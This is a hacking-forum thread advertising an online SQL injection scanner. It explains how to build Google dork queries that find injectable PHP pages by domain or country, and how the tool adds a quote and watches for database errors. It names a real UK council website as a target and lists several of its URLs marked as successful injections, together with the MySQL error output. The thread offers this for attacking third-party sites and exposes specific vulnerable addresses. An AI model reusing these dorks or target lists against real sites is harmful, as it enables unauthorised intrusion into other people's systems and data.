Jump to content
hack_addicted.pt

✩ Online SQLi Scanner FINAL VERSION ✩ (scan specific: websites/domains/country/dorks)

Recommended Posts

?hack_addicted.pt SQLi Scanner ?

--Status:[online]--

I HIGHLY recommend you to use this SQLi Scanner, and not .exe tools!

Side Note: Better dork = more results! Keep that in mind!

Note: This scanner is coded by r3m1ck, a very famous Indonesian Coder, i just modded it and uploaded it.

--

?Online SQLi Scanner ?

>Click here to Access<

--

?Explained: Online SQLi Scanner ?

?How to: Scan specific websites ?

Just use it like this:

inurl:php?id=+site:[domain of website]

you can either change it like:

inurl:php?page=+site:[domain of website]

inurl:php?type=+site:[domain of website]

If by any chance it fail's just put inurl or allinurl instead of site, like this:

inurl:php?id=+inurl:[domain of website]

inurl:php?id=+allinurl:[domain of website]

Examples:

If you want to scan specif countries websites:

for example .pt websites:

inurl:php?type=+site:.pt

or .br:

inurl:php?type=+site:.br

If you want to scan: hxtp://www.thurrock.gov.uk

use: inurl:php?=id+site:thurrock.gov.uk

results:


http://www.thurrock.gov.uk/benefits/content.php?page='advice_types <== SQL Injection Success !
http://www.thurrock.gov.uk/life/content.php?page='category&ID='13 <== SQL Injection Success !
http://www.thurrock.gov.uk/libraries/libinfo/content.php?page='library&id='6 <== SQL Injection Success !
http://www.thurrock.gov.uk/life/content.php?page='category&ID='21 <== SQL Injection Success !
http://www.thurrock.gov.uk/life/content.php?page='category&ID='16 <== SQL Injection Success !
http://www.thurrock.gov.uk/a2z/content.php?page='service&ID='349 <== SQL Injection Success !
http://www.thurrock.gov.uk/libraries/libinfo/content.php?page='library&id='1 <== SQL Injection Success !
http://www.thurrock.gov.uk/life/content.php?page='category&ID='11 <== SQL Injection Success !

It does a shearch in google, using specific words called dorks

Imagine you put this in google:

inurl:php?=id+gov

and you get a list of results: 6.980.000 results in (0,22 secs)

now to check the ones vulnerable would take you for ever if you check one by one manually, so what this script does, it puts a ' at the end of the url and shearch for specific words that would be the ones you see when you check it manually.

example (script working):

google shearch result:

hxtp://www.thurrock.gov.uk/libraries/libinfo/content.php?page=library


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<title>Thurrock Council | Library Information | Library Information</title>....
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

turns to:

hxtp://www.thurrock.gov.uk/libraries/libinfo/content.php?page='library


<!-- 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'library'
LIMIT 1' at line 22 -->
<p><b>Error: </b>Could not query the database.</p><p>Please try again later.</p>

So the script knows that the website is vuln.

And displays the result.

Any question fell free to ask. :thumbsup:

Edited by hack_addicted.pt
  • Upvote 2
Link to comment
Share on other sites

All those version are full of errors, just ask a good php coder, they will see them.

Or use my version that is already optimized.

Thanks for the offer but I'm only interested in the logic of code, how to parse pages, I have seen in the example above and when I have time I write my own code (of course without bugs seen on that example)

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...